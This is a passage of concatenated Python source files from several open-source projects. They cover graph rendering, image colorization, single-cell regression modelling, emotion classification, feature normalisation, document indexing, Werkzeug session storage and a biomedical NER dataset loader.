at the target node.
'''
if isinstance(node, str):
node = self.nodes[node]
result = node.transformer.transform(stim)
if node.is_leaf():
return listify(result)
stim = result
# If result is a generator, the first child will destroy the
# iterable, so cache via list conversion
if len(node.children) > 1 and isgenerator(stim):
stim = list(stim)
return list(chain(*[self.run_node(c, stim) for c in node.children]))
def draw(self, filename, color=True):
''' Render a plot of the graph via pygraphviz.
Args:
filename (str): Path to save the generated image to.
color (bool): If True, will color graph nodes based on their type,
otherwise will draw a black-and-white graph.
'''
verify_dependencies(['pgv'])
if not hasattr(self, '_results'):
raise RuntimeError("Graph cannot be drawn before it is executed. "
"Try calling run() first.")
g = pgv.AGraph(directed=True)
g.node_attr['colorscheme'] = 'set312'
for elem in self._results:
if not hasattr(elem, 'history'):
continue
log = elem.history
while log:
# Configure nodes
source_from = log.parent[6] if log.parent else ''
s_node = hash((source_from, log[2]))
s_color = stim_list.index(log[2])
s_color = s_color % 12 + 1
t_node = hash((log[6], log[7]))
t_style = 'filled,' if color else ''
t_style += 'dotted' if log.implicit else ''
if log[6].endswith('Extractor'):
t_color = '#0082c8'
elif log[6].endswith('Filter'):
t_color = '#e6194b'
else:
t_color = '#3cb44b'
r_node = hash((log[6], log[5]))
r_color = stim_list.index(log[5])
r_color = r_color % 12 + 1
# Add nodes
if color:
g.add_node(s_node, label=log[2], shape='ellipse',
style='filled', fillcolor=s_color)
g.add_node(t_node, label=log[6], shape='box',
style=t_style, fillcolor=t_color)
g.add_node(r_node, label=log[5], shape='ellipse',
style='filled', fillcolor=r_color)
else:
g.add_node(s_node, label=log[2], shape='ellipse')
g.add_node(t_node, label=log[6], shape='box',
style=t_style)
g.add_node(r_node, label=log[5], shape='ellipse')
# Add edges
g.add_edge(s_node, t_node, style=t_style)
g.add_edge(t_node, r_node, style=t_style)
log = log.parent
g.draw(filename, prog='dot')
def to_json(self):
''' Returns the JSON representation of this graph. '''
roots = []
for r in self.roots:
roots.append(r.to_json())
return {'roots': roots}
def save(self, filename):
''' Writes the JSON representation of this graph to the provided
filename, such that the graph can be easily reconstructed using
Graph(spec=filename).
Args:
filename (str): Path at which to write out the json file.
'''
with open(filename, 'w') as outfile:
json.dump(self.to_json(), outfile)
|
scripts/read-target.py | wushukai/NetBricks | 450 | 12739286 | #!/usr/bin/env python3
"""
Take the output of Cargo.toml and print target name.
"""
import sys
import json
def main(inp):
try:
o = json.loads(inp)
except:
print("Failed to interpret JSON", file=sys.stderr)
if 'targets' in o:
for target in o['targets']:
if 'kind' in target and (target['kind'] == 'bin' or 'bin' in target['kind']):
print(target['name'])
else:
print("No kind found")
if __name__=="__main__":
if len(sys.argv) < 2:
print("Usage: %s json"%sys.argv[0], file=sys.stderr)
sys.exit(1)
if len(sys.argv) == 2 and sys.argv[1] == '-':
inp = sys.stdin.read()
main(inp)
else:
main(' '.join(sys.argv[1:]))
|
maths/Find_Min.py | ELR424/Python | 1,568 | 12739294 | def main():
def findMin(x):
minNum = x[0]
for i in x:
if minNum > i:
minNum = i
return minNum
print(findMin([0,1,2,3,4,5,-3,24,-56])) # = -56
if __name__ == '__main__':
main()
|
cgi-bin/paint_x2_unet/cgi_exe.py | Schenng/color-wave-ml-training | 2,990 | 12739317 | #!/usr/bin/env python
import numpy as np
import chainer
from chainer import cuda, serializers, Variable # , optimizers, training
import cv2
import os.path
#import chainer.functions as F
#import chainer.links as L
#import six
#import os
#from chainer.training import extensions
#from train import Image2ImageDataset
from img2imgDataset import ImageAndRefDataset
import unet
import lnet
class Painter:
def __init__(self, gpu=0):
print("start")
self.root = "./images/"
self.batchsize = 1
self.outdir = self.root + "out/"
self.outdir_min = self.root + "out_min/"
self.gpu = gpu
self._dtype = np.float32
if not os.path.isfile("./models/unet_128_standard"):
print("./models/unet_128_standard not found. Please download them from http://paintschainer.preferred.tech/downloads/")
if not os.path.isfile("./models/unet_512_standard"):
print("./models/unet_512_standard not found. Please download them from http://paintschainer.preferred.tech/downloads/")
print("load model")
if self.gpu >= 0:
cuda.get_device(self.gpu).use()
cuda.set_max_workspace_size(64 * 1024 * 1024) # 64MB
chainer.Function.type_check_enable = False
self.cnn_128 = unet.UNET()
self.cnn_512 = unet.UNET()
if self.gpu >= 0:
self.cnn_128.to_gpu()
self.cnn_512.to_gpu()
#lnn = lnet.LNET()
#serializers.load_npz("./cgi-bin/wnet/models/model_cnn_128_df_4", cnn_128)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_cnn_128_f3_2", cnn_128)
serializers.load_npz(
"./models/unet_128_standard", self.cnn_128)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_cnn_128_ua_1", self.cnn_128)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_m_1.6", self.cnn)
serializers.load_npz(
"./models/unet_512_standard", self.cnn_512)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_p2_1", self.cnn)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/model_10000", self.cnn)
#serializers.load_npz("./cgi-bin/paint_x2_unet/models/liner_f", lnn)
def save_as_img(self, array, name):
array = array.transpose(1, 2, 0)
array = array.clip(0, 255).astype(np.uint8)
array = cuda.to_cpu(array)
(major, minor, _) = cv2.__version__.split(".")
if major == '3':
img = cv2.cvtColor(array, cv2.COLOR_YUV2RGB)
else:
img = cv2.cvtColor(array, cv2.COLOR_YUV2BGR)
cv2.imwrite(name, img)
def liner(self, id_str):
if self.gpu >= 0:
cuda.get_device(self.gpu).use()
image1 = cv2.imread(path1, cv2.IMREAD_GRAYSCALE)
image1 = np.asarray(image1, self._dtype)
if image1.ndim == 2:
image1 = image1[:, :, np.newaxis]
img = image1.transpose(2, 0, 1)
x = np.zeros((1, 3, img.shape[1], img.shape[2]), dtype='f')
if self.gpu >= 0:
x = cuda.to_gpu(x)
lnn = lnet.LNET()
with chainer.no_backprop_mode():
with chainer.using_config('train', False):
y = lnn.calc(Variable(x))
self.save_as_img(y.data[0], self.root + "line/" + id_str + ".jpg")
def colorize(self, id_str, step='C', blur=0, s_size=128,colorize_format="jpg"):
if self.gpu >= 0:
cuda.get_device(self.gpu).use()
_ = {'S': "ref/", 'L': "out_min/", 'C': "ref/"}
dataset = ImageAndRefDataset(
[id_str + ".png"], self.root + "line/", self.root + _[step])
_ = {'S': True, 'L': False, 'C': True}
sample = dataset.get_example(0, minimize=_[step], blur=blur, s_size=s_size)
_ = {'S': 0, 'L': 1, 'C': 0}[step]
sample_container = np.zeros(
(1, 4, sample[_].shape[1], sample[_].shape[2]), dtype='f')
sample_container[0, :] = sample[_]
if self.gpu >= 0:
sample_container = cuda.to_gpu(sample_container)
cnn = {'S': self.cnn_128, 'L': self.cnn_512, 'C': self.cnn_128}
with chainer.no_backprop_mode():
with chainer.using_config('train', False):
image_conv2d_layer = cnn[step].calc(Variable(sample_container))
del sample_container
if step == 'C':
input_bat = np.zeros((1, 4, sample[1].shape[1], sample[1].shape[2]), dtype='f')
print(input_bat.shape)
input_bat[0, 0, :] = sample[1]
output = cuda.to_cpu(image_conv2d_layer.data[0])
del image_conv2d_layer # release memory
for channel in range(3):
input_bat[0, 1 + channel, :] = cv2.resize(
output[channel, :],
(sample[1].shape[2], sample[1].shape[1]),
interpolation=cv2.INTER_CUBIC)
if self.gpu >= 0:
link = cuda.to_gpu(input_bat, None)
else:
link = input_bat
with chainer.no_backprop_mode():
with chainer.using_config('train', False):
image_conv2d_layer = self.cnn_512.calc(Variable(link))
del link # release memory
image_out_path = {
'S': self.outdir_min + id_str + ".png",
'L': self.outdir + id_str + ".jpg",
'C': self.outdir + id_str + "_0." + colorize_format}
self.save_as_img(image_conv2d_layer.data[0], image_out_path[step])
del image_conv2d_layer
if __name__ == '__main__':
for n in range(1):
p = Painter()
print(n)
p.colorize(n * p.batchsize)
|
cell2location/models/base/regression_torch_model.py | nadavyayon/cell2location | 127 | 12739330 | <reponame>nadavyayon/cell2location
# -*- coding: utf-8 -*-
"""RegressionTorchModel Base class for model with no cell specific parameters"""
import matplotlib.pyplot as plt
# +
import numpy as np
import pandas as pd
from cell2location.models.base.torch_model import TorchModel
class RegressionTorchModel(TorchModel):
r"""Base class for regression models with no cell-specific parameters (enable minibatch training).
:param sample_id: str with column name in cell2covar that denotes sample
:param cell2covar: pd.DataFrame with covariates in columns and cells in rows, rows should be named.
:param X_data: Numpy array of gene expression (cols) in cells (rows)
:param n_iter: number of iterations, when using minibatch, the number of epochs (passes through all data),
supersedes self.n_iter
:param (data_type, learning_rate, total_grad_norm_constraint, verbose, var_names, var_names_read, obs_names, fact_names):
arguments for parent class :func:`~cell2location.models.BaseModel`
:param minibatch_size: if None all data is used for training,
if not None - the number of cells / observations per batch. For best results use 1024 cells per batch.
:param minibatch_seed: order of cells in minibatch is chose randomly, so a seed for each traning restart
should be provided
:param prior_eps: numerical stability constant added to initial values
:param nb_param_conversion_eps: NB distribution numerical stability constant, see :func:`~cell2location.models.TorchModel.nb_log_prob`
:param use_cuda: boolean, telling pytorch to use the GPU (if true).
:param use_average_as_initial_value: boolean, use average gene expression for each categorical covariate as initial value?
:param stratify_cv: when using cross-validation on cells (selected in the training method), this is a pd.Series that
tells :func:`~sklearn.model_selection.train_test_split` how to stratify when creating a split.
"""
def __init__(
self,
sample_id,
cell2covar: pd.DataFrame,
X_data: np.ndarray,
data_type="float32",
n_iter=200000,
learning_rate=0.001,
total_grad_norm_constraint=200,
verbose=True,
var_names=None,
var_names_read=None,
obs_names=None,
fact_names=None,
minibatch_size=None,
minibatch_seed=[41, 56, 345],
prior_eps=1e-8,
nb_param_conversion_eps=1e-8,
use_cuda=False,
use_average_as_initial_value=True,
stratify_cv=None,
):
############# Initialise parameters ################
# convert covariates to binary matrix
# test for column types, get dummies for categorical / character, and just copy over continous
cell2covar_df = pd.get_dummies(cell2covar.loc[:, ~cell2covar.columns.isin([sample_id])])
cell2sample_df = pd.get_dummies(cell2covar[[sample_id]])
cell2sample_covar_df = pd.concat([cell2sample_df, cell2covar_df], axis=1)
fact_names = cell2sample_covar_df.columns
n_fact = cell2sample_covar_df.shape[1]
# extract obs names and sample id
obs_names = cell2covar.index
sample_id = cell2covar[sample_id]
super().__init__(
X_data,
n_fact,
data_type,
n_iter,
learning_rate,
total_grad_norm_constraint,
verbose,
var_names,
var_names_read,
obs_names,
fact_names,
sample_id,
use_cuda,
)
self.nb_param_conversion_eps = nb_param_conversion_eps
self.cell_factors_df = None
self.minibatch_size = minibatch_size
self.minibatch_seed = minibatch_seed
self.n_cells_total = self.n_obs
self.which_sample = self.fact_names.isin(cell2sample_df.columns)
self.n_samples = np.sum(self.which_sample)
self.n_covar = self.n_fact - self.n_samples
self.prior_eps = prior_eps
self.cell2sample_df = cell2sample_df
self.cell2sample_covar_df = cell2sample_covar_df
# convert to np.ndarray
self.cell2sample_mat = cell2sample_df.values
self.cell2sample_covar_mat = cell2sample_covar_df.values
# find mean and variance for each gene
self.gene_mean = (self.X_data + self.prior_eps).mean(0).astype(self.data_type).reshape((1, self.n_var))
self.noise_gene_mean = (self.gene_mean / 10).astype(self.data_type).reshape((1, self.n_var))
self.prior_gene_mean = np.concatenate([self.noise_gene_mean, self.gene_mean], axis=0)
self.stratify_cv = stratify_cv
self.extra_data["cell2sample_covar"] = self.cell2sample_covar_mat
if use_average_as_initial_value:
# compute initial value for parameters: cluster averages
self.cell2sample_covar_sig_mat = self.cell2sample_covar_mat / self.cell2sample_covar_mat.sum(0)
self.clust_average_mat = np.dot(self.cell2sample_covar_sig_mat.T, self.X_data) + self.prior_eps
self.clust_average_mat[self.which_sample, :] = self.clust_average_mat[self.which_sample, :] / 10
# aver = get_cluster_averages(adata_snrna_raw, 'annotation_1') + self.prior_eps
# variances = get_cluster_variances(adata_snrna_raw, 'annotation_1') + self.prior_eps
# shape = aver ** 2 / variances
# shape = shape.mean(1).values
# overdisp_mean = shape.reshape((1, adata_snrna_raw.shape[1]))
self.gene_E_mat = None # np.sqrt(1 / overdisp_mean) # get gene_E ~ Exponential()
else:
self.clust_average_mat = None
self.gene_E_mat = None
# =====================Other functions======================= #
def plot_gene_budget(self):
plt.hist(np.log10(self.samples["post_sample_means"]["gene_level"][:, 0]), bins=50)
plt.xlabel("Gene expression level (hierarchical)")
plt.title("Gene expression level (hierarchical)")
plt.tight_layout()
def sample2df(self, gene_node_name="gene_factors", sample_type="means"):
r"""Export cell factors as Pandas data frames.
:param node_name: name of the cell factor model parameter to be exported
:param gene_node_name: name of the gene factor model parameter to be exported
:param sample_type: type of posterior sample (means, q05, q95, sds)
:return: 8 Pandas dataframes added to model object:
.covariate_effects, .covariate_effects_sd, .covariate_effects_q05, .covariate_effects_q95
.sample_effects, .sample_effects_sd, .sample_effects_q05, .sample_effects_q95
"""
# export parameters for covariate effects
cov_ind = ~self.which_sample
self.covariate_effects = pd.DataFrame.from_records(
self.samples["post_sample_" + sample_type][gene_node_name][cov_ind, :].T,
index=self.var_names,
columns=[sample_type + "_cov_effect_" + i for i in self.fact_names[cov_ind]],
)
# export parameters for sample effects
sample_ind = self.which_sample
self.sample_effects = pd.DataFrame.from_records(
self.samples["post_sample_" + sample_type][gene_node_name][sample_ind, :].T,
index=self.var_names,
columns=[sample_type + "_sample_effect" + i for i in self.fact_names[sample_ind]],
)
def annotate_cell_adata(self, adata, use_raw=True):
r"""Add covariate and sample coefficients to anndata.var
:param adata: anndata object to annotate
:return: updated anndata object
"""
if self.cell_factors_df is None:
self.sample2df()
if use_raw is True:
var_index = adata.raw.var.index
### Covariate effect
# add gene factors to adata
adata.raw.var[self.covariate_effects.columns] = self.covariate_effects.loc[var_index, :]
### Sample effects
# add gene factors to adata
adata.raw.var[self.sample_effects.columns] = self.sample_effects.loc[var_index, :]
else:
var_index = adata.var.index
### Covariate effect
# add gene factors to adata
adata.var[self.covariate_effects.columns] = self.covariate_effects.loc[var_index, :]
### Sample effects
# add gene factors to adata
adata.var[self.sample_effects.columns] = self.sample_effects.loc[var_index, :]
return adata
|
emotion.py | hyungkwonko/FacePose_pytorch | 499 | 12739385 | import cv2
import torch
from torchvision import transforms
import math
import numpy as np
import torchvision.models as models
import torch.utils.data as data
from torchvision import transforms
import cv2
import torch.nn.functional as F
from torch.autograd import Variable
import pandas as pd
import os ,torch
import torch.nn as nn
import time
import argparse
result = ["Surprise","Fear","Disgust","Happiness","Sadness","Anger","Neutral"]
class Res18Feature(nn.Module):
def __init__(self, pretrained, num_classes = 7):
super(Res18Feature, self).__init__()
resnet = models.resnet18(pretrained)
self.features = nn.Sequential(*list(resnet.children())[:-1])
fc_in_dim = list(resnet.children())[-1].in_features
self.fc = nn.Linear(fc_in_dim, num_classes)
self.alpha = nn.Sequential(nn.Linear(fc_in_dim, 1),nn.Sigmoid())
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
attention_weights = self.alpha(x)
out = attention_weights * self.fc(x)
return attention_weights, out
model_save_path = "./checkpoint/wiki2020.pth" #mode path
def main(args):
preprocess_transform = transforms.Compose([transforms.ToPILImage(),transforms.Resize((224, 224)),transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])])
res18 = Res18Feature(pretrained = False)
checkpoint = torch.load(model_save_path)
res18.load_state_dict(checkpoint['model_state_dict'])
res18.cuda()
res18.eval()
for i in [0]:
time1=time.time()
image = cv2.imread(args.img)
image = image[:, :, ::-1]
image_tensor = preprocess_transform(image)
tensor = Variable(torch.unsqueeze(image_tensor, dim=0).float(), requires_grad=False)
tensor=tensor.cuda()
time2=time.time()
_, outputs = res18(tensor)
_, predicts = torch.max(outputs, 1)
print(result[int(predicts.cpu().data)])
def parse_args():
parser = argparse.ArgumentParser(description='Testing')
parser.add_argument('--img',default="./img/suripse.jpg",type=str)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_args()
main(args)
|
homemade/utils/features/normalize.py | gvvynplaine/homemade-machine-learning | 19,413 | 12739386 | <gh_stars>1000+
"""Normalize features"""
import numpy as np
def normalize(features):
"""Normalize features.
Normalizes input features X. Returns a normalized version of X where the mean value of
each feature is 0 and deviation is close to 1.
:param features: set of features.
:return: normalized set of features.
"""
# Copy original array to prevent it from changes.
features_normalized = np.copy(features).astype(float)
# Get average values for each feature (column) in X.
features_mean = np.mean(features, 0)
# Calculate the standard deviation for each feature.
features_deviation = np.std(features, 0)
# Subtract mean values from each feature (column) of every example (row)
# to make all features be spread around zero.
if features.shape[0] > 1:
features_normalized -= features_mean
# Normalize each feature values so that all features are close to [-1:1] boundaries.
# Also prevent division by zero error.
features_deviation[features_deviation == 0] = 1
features_normalized /= features_deviation
return features_normalized, features_mean, features_deviation
|
forte/processors/base/index_processor.py | J007X/forte | 163 | 12739394 | <filename>forte/processors/base/index_processor.py
# Copyright 2020 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Index processor
"""
from abc import ABC
from typing import Dict, Any, List, Tuple
from forte.common import Resources
from forte.common.configuration import Config
from forte.data.data_pack import DataPack
from forte.processors.base.pack_processor import PackProcessor
__all__ = ["IndexProcessor", "IndexProcessorWithDatapack"]
class IndexProcessor(PackProcessor, ABC):
r"""A base processor for indexing documents into traditional indexers like
Elasticsearch and/or dense vector indexers like Faiss. Subclasses need to
implement :meth:`IndexProcessor::_bulk_process`.
"""
# pylint: disable=useless-super-delegation
def __init__(self) -> None:
super().__init__()
self.documents: List[Dict[str, str]] = []
@classmethod
def default_configs(cls) -> Dict[str, Any]:
return {"batch_size": 128}
def _bulk_process(self):
r"""Subclasses of :class:`IndexProcessor` should implement this method
to bulk add the documents into the index.
"""
raise NotImplementedError
def _field_names(self) -> List[str]:
r"""Subclasses of :class:`IndexProcessor` should implement this method
to provide the field name for indexing.
The return value from :func:`_content_for_index` will be added into
these fields. The length of the return value of this function should
be the same as the return value for :func:`_content_for_index`.
Returns:
"""
raise NotImplementedError
def _content_for_index(self, input_pack: DataPack) -> List[str]:
raise NotImplementedError
def _process(self, input_pack: DataPack):
# self.documents.append((str(input_pack.pack_id), input_pack.text))
index_pairs: Dict[str, str] = dict(
zip(self._field_names(), self._content_for_index(input_pack))
)
self.documents.append(index_pairs)
if len(self.documents) == self.configs.batch_size:
self._bulk_process()
self.documents = []
def flush(self):
if len(self.documents) > 0:
self._bulk_process()
class IndexProcessorWithDatapack(PackProcessor, ABC):
r"""A base processor for indexing a document with its original datapack
into traditional indexers like Elasticsearch.
Subclasses need to implement
:meth:`IndexProcessorWithDatapack::_bulk_process`.
"""
# pylint: disable=useless-super-delegation
def __init__(self) -> None:
super().__init__()
self.documents: List[Tuple[str, str, str]] = []
# pylint: disable=attribute-defined-outside-init
def initialize(self, resources: Resources, configs: Config):
self.resources = resources
self.config = configs
@classmethod
def default_configs(cls) -> Dict[str, Any]:
config = super().default_configs()
config.update({"batch_size": 128})
return config
def _bulk_process(self):
r"""Subclasses of :class:`IndexProcessorWithDatapack`
should implement this method
to bulk add the documents into the index.
"""
raise NotImplementedError
def _process(self, input_pack: DataPack):
serialized_datapack: str = input_pack.to_string()
self.documents.append(
(str(input_pack.pack_id), input_pack.text, serialized_datapack)
)
if len(self.documents) == self.config.batch_size:
self._bulk_process()
self.documents = []
def flush(self):
if len(self.documents) > 0:
self._bulk_process()
|
virtual/lib/python3.6/site-packages/werkzeug/contrib/sessions.py | kenmutuma001/Blog | 384 | 12739418 | # -*- coding: utf-8 -*-
r"""
werkzeug.contrib.sessions
~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains some helper classes that help one to add session
support to a python WSGI application. For full client-side session
storage see :mod:`~werkzeug.contrib.securecookie` which implements a
secure, client-side session storage.
Application Integration
=======================
::
from werkzeug.contrib.sessions import SessionMiddleware, \
FilesystemSessionStore
app = SessionMiddleware(app, FilesystemSessionStore())
The current session will then appear in the WSGI environment as
`werkzeug.session`. However it's recommended to not use the middleware
but the stores directly in the application. However for very simple
scripts a middleware for sessions could be sufficient.
This module does not implement methods or ways to check if a session is
expired. That should be done by a cronjob and storage specific. For
example to prune unused filesystem sessions one could check the modified
time of the files. If sessions are stored in the database the new()
method should add an expiration timestamp for the session.
For better flexibility it's recommended to not use the middleware but the
store and session object directly in the application dispatching::
session_store = FilesystemSessionStore()
def application(environ, start_response):
request = Request(environ)
sid = request.cookies.get('cookie_name')
if sid is None:
request.session = session_store.new()
else:
request.session = session_store.get(sid)
response = get_the_response_object(request)
if request.session.should_save:
session_store.save(request.session)
response.set_cookie('cookie_name', request.session.sid)
return response(environ, start_response)
:copyright: 2007 Pallets
:license: BSD-3-Clause
"""
import os
import re
import tempfile
import warnings
from hashlib import sha1
from os import path
from pickle import dump
from pickle import HIGHEST_PROTOCOL
from pickle import load
from random import random
from time import time
from .._compat import PY2
from .._compat import text_type
from ..datastructures import CallbackDict
from ..filesystem import get_filesystem_encoding
from ..posixemulation import rename
from ..utils import dump_cookie
from ..utils import parse_cookie
from ..wsgi import ClosingIterator
warnings.warn(
"'werkzeug.contrib.sessions' is deprecated as of version 0.15 and"
" will be removed in version 1.0. It has moved to"
" https://github.com/pallets/secure-cookie.",
DeprecationWarning,
stacklevel=2,
)
_sha1_re = re.compile(r"^[a-f0-9]{40}$")
def _urandom():
if hasattr(os, "urandom"):
return os.urandom(30)
return text_type(random()).encode("ascii")
def generate_key(salt=None):
if salt is None:
salt = repr(salt).encode("ascii")
return sha1(b"".join([salt, str(time()).encode("ascii"), _urandom()])).hexdigest()
class ModificationTrackingDict(CallbackDict):
__slots__ = ("modified",)
def __init__(self, *args, **kwargs):
def on_update(self):
self.modified = True
self.modified = False
CallbackDict.__init__(self, on_update=on_update)
dict.update(self, *args, **kwargs)
def copy(self):
"""Create a flat copy of the dict."""
missing = object()
result = object.__new__(self.__class__)
for name in self.__slots__:
val = getattr(self, name, missing)
if val is not missing:
setattr(result, name, val)
return result
def __copy__(self):
return self.copy()
class Session(ModificationTrackingDict):
"""Subclass of a dict that keeps track of direct object changes. Changes
in mutable structures are not tracked, for those you have to set
`modified` to `True` by hand.
"""
__slots__ = ModificationTrackingDict.__slots__ + ("sid", "new")
def __init__(self, data, sid, new=False):
ModificationTrackingDict.__init__(self, data)
self.sid = sid
self.new = new
def __repr__(self):
return "<%s %s%s>" % (
self.__class__.__name__,
dict.__repr__(self),
"*" if self.should_save else "",
)
@property
def should_save(self):
"""True if the session should be saved.
.. versionchanged:: 0.6
By default the session is now only saved if the session is
modified, not if it is new like it was before.
"""
return self.modified
class SessionStore(object):
"""Baseclass for all session stores. The Werkzeug contrib module does not
implement any useful stores besides the filesystem store, application
developers are encouraged to create their own stores.
:param session_class: The session class to use. Defaults to
:class:`Session`.
"""
def __init__(self, session_class=None):
if session_class is None:
session_class = Session
self.session_class = session_class
def is_valid_key(self, key):
"""Check if a key has the correct format."""
return _sha1_re.match(key) is not None
def generate_key(self, salt=None):
"""Simple function that generates a new session key."""
return generate_key(salt)
def new(self):
"""Generate a new session."""
return self.session_class({}, self.generate_key(), True)
def save(self, session):
"""Save a session."""
def save_if_modified(self, session):
"""Save if a session class wants an update."""
if session.should_save:
self.save(session)
def delete(self, session):
"""Delete a session."""
def get(self, sid):
"""Get a session for this sid or a new session object. This method
has to check if the session key is valid and create a new session if
that wasn't the case.
"""
return self.session_class({}, sid, True)
#: used for temporary files by the filesystem session store
_fs_transaction_suffix = ".__wz_sess"
class FilesystemSessionStore(SessionStore):
"""Simple example session store that saves sessions on the filesystem.
This store works best on POSIX systems and Windows Vista / Windows
Server 2008 and newer.
.. versionchanged:: 0.6
`renew_missing` was added. Previously this was considered `True`,
now the default changed to `False` and it can be explicitly
deactivated.
:param path: the path to the folder used for storing the sessions.
If not provided the default temporary directory is used.
:param filename_template: a string template used to give the session
a filename. ``%s`` is replaced with the
session id.
:param session_class: The session class to use. Defaults to
:class:`Session`.
:param renew_missing: set to `True` if you want the store to
give the user a new sid if the session was
not yet saved.
"""
def __init__(
self,
path=None,
filename_template="werkzeug_%s.sess",
session_class=None,
renew_missing=False,
mode=0o644,
):
SessionStore.__init__(self, session_class)
if path is None:
path = tempfile.gettempdir()
self.path = path
if isinstance(filename_template, text_type) and PY2:
filename_template = filename_template.encode(get_filesystem_encoding())
assert not filename_template.endswith(_fs_transaction_suffix), (
"filename templates may not end with %s" % _fs_transaction_suffix
)
self.filename_template = filename_template
self.renew_missing = renew_missing
self.mode = mode
def get_session_filename(self, sid):
# out of the box, this should be a strict ASCII subset but
# you might reconfigure the session object to have a more
# arbitrary string.
if isinstance(sid, text_type) and PY2:
sid = sid.encode(get_filesystem_encoding())
return path.join(self.path, self.filename_template % sid)
def save(self, session):
fn = self.get_session_filename(session.sid)
fd, tmp = tempfile.mkstemp(suffix=_fs_transaction_suffix, dir=self.path)
f = os.fdopen(fd, "wb")
try:
dump(dict(session), f, HIGHEST_PROTOCOL)
finally:
f.close()
try:
rename(tmp, fn)
os.chmod(fn, self.mode)
except (IOError, OSError):
pass
def delete(self, session):
fn = self.get_session_filename(session.sid)
try:
os.unlink(fn)
except OSError:
pass
def get(self, sid):
if not self.is_valid_key(sid):
return self.new()
try:
f = open(self.get_session_filename(sid), "rb")
except IOError:
if self.renew_missing:
return self.new()
data = {}
else:
try:
try:
data = load(f)
except Exception:
data = {}
finally:
f.close()
return self.session_class(data, sid, False)
def list(self):
"""Lists all sessions in the store.
.. versionadded:: 0.6
"""
before, after = self.filename_template.split("%s", 1)
filename_re = re.compile(
r"%s(.{5,})%s$" % (re.escape(before), re.escape(after))
)
result = []
for filename in os.listdir(self.path):
#: this is a session that is still being saved.
if filename.endswith(_fs_transaction_suffix):
continue
match = filename_re.match(filename)
if match is not None:
result.append(match.group(1))
return result
class SessionMiddleware(object):
"""A simple middleware that puts the session object of a store provided
into the WSGI environ. It automatically sets cookies and restores
sessions.
However a middleware is not the preferred solution because it won't be as
fast as sessions managed by the application itself and will put a key into
the WSGI environment only relevant for the application which is against
the concept of WSGI.
The cookie parameters are the same as for the :func:`~dump_cookie`
function just prefixed with ``cookie_``. Additionally `max_age` is
called `cookie_age` and not `cookie_max_age` because of backwards
compatibility.
"""
def __init__(
self,
app,
store,
cookie_name="session_id",
cookie_age=None,
cookie_expires=None,
cookie_path="/",
cookie_domain=None,
cookie_secure=None,
cookie_httponly=False,
cookie_samesite="Lax",
environ_key="werkzeug.session",
):
self.app = app
self.store = store
self.cookie_name = cookie_name
self.cookie_age = cookie_age
self.cookie_expires = cookie_expires
self.cookie_path = cookie_path
self.cookie_domain = cookie_domain
self.cookie_secure = cookie_secure
self.cookie_httponly = cookie_httponly
self.cookie_samesite = cookie_samesite
self.environ_key = environ_key
def __call__(self, environ, start_response):
cookie = parse_cookie(environ.get("HTTP_COOKIE", ""))
sid = cookie.get(self.cookie_name, None)
if sid is None:
session = self.store.new()
else:
session = self.store.get(sid)
environ[self.environ_key] = session
def injecting_start_response(status, headers, exc_info=None):
if session.should_save:
self.store.save(session)
headers.append(
(
"Set-Cookie",
dump_cookie(
self.cookie_name,
session.sid,
self.cookie_age,
self.cookie_expires,
self.cookie_path,
self.cookie_domain,
self.cookie_secure,
self.cookie_httponly,
samesite=self.cookie_samesite,
),
)
)
return start_response(status, headers, exc_info)
return ClosingIterator(
self.app(environ, injecting_start_response),
lambda: self.store.save_if_modified(session),
)
|
datasets/bc2gm_corpus/bc2gm_corpus.py | dkajtoch/datasets | 10,608 | 12739424 | <reponame>dkajtoch/datasets<filename>datasets/bc2gm_corpus/bc2gm_corpus.py<gh_stars>1000+
# coding=utf-8
# Copyright 2020 HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""BioCreative II gene mention recognition Corpus"""
import datasets
logger = datasets.logging.get_logger(__name__)
_CITATION = """\
@article{smith2008overview,
title={Overview of BioCreative II gene mention recognition},
author={<NAME> and <NAME>, <NAME>, <NAME> and <NAME> and others},
journal={Genome biology},
volume={9},
number={S2},
pages={S2},
year={2008},
publisher={Springer}
}
"""
_DESCRIPTION = """\
Nineteen teams presented results for the Gene Mention Task at the BioCreative II Workshop.
In this task participants designed systems to identify substrings in sentences corresponding to gene name mentions.
A variety of different methods were used and the results varied with a highest achieved F1 score of 0.8721.
Here we present brief descriptions of all the methods used and a statistical analysis of the results.
We also demonstrate that, by combining the results from all submissions, an F score of 0.9066 is feasible,
and furthermore that the best result makes use of the lowest scoring submissions.
For more details, see: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2559986/
The original dataset can be downloaded from: https://biocreative.bioinformatics.udel.edu/resources/corpora/biocreative-ii-corpus/
This dataset has been converted to CoNLL format for NER using the following tool: https://github.com/spyysalo/standoff2conll
"""
_HOMEPAGE = "https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2559986/"
_URL = "https://github.com/spyysalo/bc2gm-corpus/raw/master/conll/"
_TRAINING_FILE = "train.tsv"
_DEV_FILE = "devel.tsv"
_TEST_FILE = "test.tsv"
class Bc2gmCorpusConfig(datasets.BuilderConfig):
"""BuilderConfig for Bc2gmCorpus"""
def __init__(self, **kwargs):
"""BuilderConfig for Bc2gmCorpus.
Args:
